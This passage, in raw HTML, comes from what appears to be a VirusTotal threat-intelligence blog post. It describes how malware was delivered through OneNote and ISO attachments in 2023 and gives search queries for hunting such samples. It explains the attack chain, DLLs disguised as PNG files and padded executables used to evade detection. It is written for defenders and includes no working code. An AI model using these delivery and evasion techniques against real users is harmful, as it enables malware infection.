becoming a popular format for malware distributed as email attachments in 2023. We will describe the OneNote attack flow in the next section. In 2023, it became the fastest-growing format for malicious attachments, by percentage.</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Jzy8H6cwMMa6WwrH8JCbF1msv25tGSn6hzGNjiMrsLpKaGImbATGy9BDIGqgP8VmJYIH31FvbX2Ik4ZXmrxZK3EiaHpPhmoI0e22EbYexbQEItiHD7drHyaa43QKWLaKdb1wSUuHOS2Hb8MuJ5AC3_x2YsAZQt5f3FkUJfx-WIAUbOPH1O3gGWm_rRc/s891/rep1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="555" data-original-width="891" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Jzy8H6cwMMa6WwrH8JCbF1msv25tGSn6hzGNjiMrsLpKaGImbATGy9BDIGqgP8VmJYIH31FvbX2Ik4ZXmrxZK3EiaHpPhmoI0e22EbYexbQEItiHD7drHyaa43QKWLaKdb1wSUuHOS2Hb8MuJ5AC3_x2YsAZQt5f3FkUJfx-WIAUbOPH1O3gGWm_rRc/s16000/rep1.png" /></a></div><br /><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div><div><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div><div><span face=""Google Sans", sans-serif" style="background-color: transparent; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><p dir="ltr" style="background-color: white; color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 3pt; padding: 0pt 0pt 6pt;"><span style="background-color: transparent; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">In 2023, we saw a significant increase in the use of JavaScript distributed alongside HTML, in sophisticated phishing attacks designed to steal victims' credentials. Excel, RTF, CAB, compressed formats, and Word all seem to be declining in popularity as malicious attachments.</span></p><span style="color: #1f1f1f;"><span style="font-size: 10.5pt;"><br /></span></span><h3 dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline;">OneNote to rule them all</span></h3><span style="color: #1f1f1f;"><span style="font-size: 10.5pt;"><br /></span></span><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Suspicious OneNote files uploaded to VirusTotal can we filtered using the following VTI query:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520type%253Aone%2520p%253A%25205%252B/files" style="text-decoration-line: none;"><span face="Arial, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file type:one p:5+</span></a></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Most of the files in our collection were submitted in 2023. We can observe how AntiVirus detection during January and the first half of February was significantly lower than afterwards, when security vendors improved their detection for this format. </span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSBE-odDeV8FbE3e9-q3_sJqXiwS52P4IOq8iB88fFBXvnQnKtTjCf5ZxVLLqbzz2fv4pX9QPCg8UxI9keqnXotGHKKdTruMxVKkRhVh5A15UzEQJZoM7_voBVHddqwAlzyZfxMzQw2022LowwKr6uWoWXRwYdeaCRjz7kz9fSkXEmow6Wkz8mUQD0aR4/s720/rep2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="521" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSBE-odDeV8FbE3e9-q3_sJqXiwS52P4IOq8iB88fFBXvnQnKtTjCf5ZxVLLqbzz2fv4pX9QPCg8UxI9keqnXotGHKKdTruMxVKkRhVh5A15UzEQJZoM7_voBVHddqwAlzyZfxMzQw2022LowwKr6uWoWXRwYdeaCRjz7kz9fSkXEmow6Wkz8mUQD0aR4/s16000/rep2.png" /></a></div><br /><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Malicious OneNote files usually embed a malicious file (vba, html+jscript, powershell, or any combination of them) and, as happens with malicious Office attachments, try to convince the victim to allow execution. </span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/collection/e-73ec2712249a10574ab9d37461dfec7480173fa106e411586f41cac444a8ce61" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Commonalities</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> for the files resulting the previous search offer some interesting data on who is currently using this format for distribution:</span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Many of them distribute QBot, RemcosRAT or </span><a href="https://www.virustotal.com/gui/file/9b872405b3a94a85364e4562b93b33238b82d1b5d0241c645f3f49bf045d1498" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">AsyncRAT</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. We also found </span><a href="https://www.virustotal.com/gui/file/d8cca538ecd91252ed5294bd8bbbb5772245e8b1315fd9723e1f08ee4ef6958d/community" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Emotet</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> malware samples using Onenote for spreading.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Around 20% seem to distribute QakBot.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The </span><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520crowdsourced_yara_rule%253A01267baf74%257CMicrosoft_OneNote_with_Suspicious_String/files" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Microsoft_OneNote_with_Suspicious_String</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Crowdsource Yara rule seems to provide good detection with a low false positive ratio. </span></p></li></ul><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Payloads vary from family to family, but many of them access external URLs to download a DLL file camouflaged as a PNG file. This is a </span><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520path%253A%2522*.png%2522%2520tag%253Adownloads-pe/urls" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">very old trick</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> used to bypass basic firewall rules or just look less suspicious to the eye. </span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We can find several examples of this, for example searching for BumbleBee malware samples reaching a remote "view.png" file or Qakbot samples contacting "01.png" in any network resource.</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The most usual kill chain where OneNote format is involved is as follows:</span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The victim receives an email with a OneNote attachment. The mail body encourages the victim to click on a button to see a hidden/distorted image or document.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This button executes a script (VB script, HTA, powershell, etc,) that will launch a payload, either embedded into the same script or downloaded from an external resource. </span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The external payload might be yet another OneNote file, an image file renamed as a ".bat" file, a DLL file that's loaded into memory or even a Windows executable.</span></p></li></ul><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">The following is an example of an obfuscated second stage </span><a href="https://www.virustotal.com/gui/file/a090db54343f919a8604eec2e601cba1ffd8bbf069a286dbf4b0b5b4e91954ea?nocache=1" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">.Net executable</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> payload extracted from this </span><a href="https://www.virustotal.com/gui/file/bb79400c2adcaf1529e04490ce4a41a421ae467518f8ff942c279ff0a8c3f6c6/content" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">powershell script</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">:</span></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJqpPLr3XPPo5dvbUag8tQ6VDgFJvHJ1WxWuDLPjI0Dk7oJA8KxJrdVetFtLMUoMRJKIHFlAJeEbywKcIsZNXTAl20YqUEv9Xob05ZfWGUGsb9BpIku3em2PECxlzHizHeV82lPNy66NASc4HDlv3aQJdnMGOt9VJ_SWq8hwB4P2HS5ryiu_0n5a7PnWs/s936/rep3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="936" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJqpPLr3XPPo5dvbUag8tQ6VDgFJvHJ1WxWuDLPjI0Dk7oJA8KxJrdVetFtLMUoMRJKIHFlAJeEbywKcIsZNXTAl20YqUEv9Xob05ZfWGUGsb9BpIku3em2PECxlzHizHeV82lPNy66NASc4HDlv3aQJdnMGOt9VJ_SWq8hwB4P2HS5ryiu_0n5a7PnWs/s16000/rep3.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></span><p></p><h3 dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: #434343; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ISO files as a flexible alternative</span></h3><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Windows-targeting malware bundled in ISO files is a highly popular delivery method used by threat actors these days. It is used on a large scale for crimeware distribution as well as </span><a href="https://blog.virustotal.com/2022/11/not-dream-job-hunting-for-malicious-job.html" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">high profile APT campaigns actors</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. You can use the “isoimage” tag to list ISO files in VTI:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">You can be more specific to detect only those ISO files containing an executable: </span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520(tag%253Acontains-pe%2520OR%2520tag%253Acontains-elf%2520OR%2520tag%253Acontains-macho)/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage (tag:contains-pe OR tag:contains-elf OR tag:contains-macho)</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Another interesting approach is to leverage Sandbox reports to get ISOs files interacting (drop/delete/open/execute) with specific file types during their execution:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%3Afile%20tag%3Aisoimage%20behaviour_files%3A%22.exe%22%20not%20tag%3Acontains-pe/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage behaviour_files:".exe" not tag:contains-pe</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Using this method you are not only no longer dependent on the “contains-pe” tag (that could be missed in some cases), but also you are able to discover ISOs with “hidden” executables, for example </span><a href="https://www.virustotal.com/gui/file/6424e5edad3565a1a2f339b8622d8b394ce0525678d099fbbeb18d5c1865098f/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">ISO containing archives</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> that contain executables. It is also possible to detect cases when an ISO file contains only a non-binary file, like LNK or script, that drops and executes a malicious PE payload. </span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It is possible to identify ISO clusters for specific malware campaigns. For instance, you can get samples used in a </span><a href="https://unit42.paloaltonetworks.com/chromeloader-malware/#post-123828-_p26kzjrz0h87" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">ChromeLoader</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> distribution campaign with the following name and size filters:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520name%253A%2522Your%2520File%2520Is%2520Ready%2520To%2520Download%2522%2520size%253A100Mb%252B/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage name:"Your File Is Ready To Download" size:100Mb+</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Another interesting ISO cluster contains artificially zero-byte inflated executables, allowing attackers to compress the resulting ISO file from 300Mb to 400Kb:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuk3PmOocSYIcmxSwUDzMKJDlX2zwALBIdhSKjHNmG-Hgbplxnq13If1pE5TKaPJ5h7cSMcJM5PpQO3vVjoHozdsyUf-NAgswbzoT6qerHzYAjc9AVesvsJH1XWWLtdxapjVfmSnOMsc0I62LPPeZrxr4B3SE6a-wdnZ2odY-9XA8eDOVTFhCXjMwCEM/s940/rep4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="940" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuk3PmOocSYIcmxSwUDzMKJDlX2zwALBIdhSKjHNmG-Hgbplxnq13If1pE5TKaPJ5h7cSMcJM5PpQO3vVjoHozdsyUf-NAgswbzoT6qerHzYAjc9AVesvsJH1XWWLtdxapjVfmSnOMsc0I62LPPeZrxr4B3SE6a-wdnZ2odY-9XA8eDOVTFhCXjMwCEM/s16000/rep4.png" /></a><i style="color: black; font-size: 11pt;"> <a href="https://www.virustotal.com/gui/file/e89f916f41ba07edbe766fce7d270d8878c51c38f87f76cf191a73026478100a/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Example</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> of ISO file with artificially inflated executable inside</span></i></div><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The following query will help you find some of these examples:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520size%253A300Mb%252B%2520size%253A316Mb-%2520p%253A3%252B%2520have%253Acompressed_parents/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage size:300Mb+ size:316Mb- p:3+ have:compressed_parents</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We also found something that appears to be a malware campaign distributing weaponized versions of legitimate software, including “</span><a href="https://github.com/Crypto-Notepad/Crypto-Notepad" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Crypto Notepad</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">”, within ISO files. Examining one of the </span><a href="https://www.virustotal.com/gui/file/857ab1e6d35182286af818e82dcd7b39c44f547bb33158ff2a9ecfaa1ea4823f/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">samples</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">, we can see that the bundled .NET executable is also inflated with zero-bytes up to 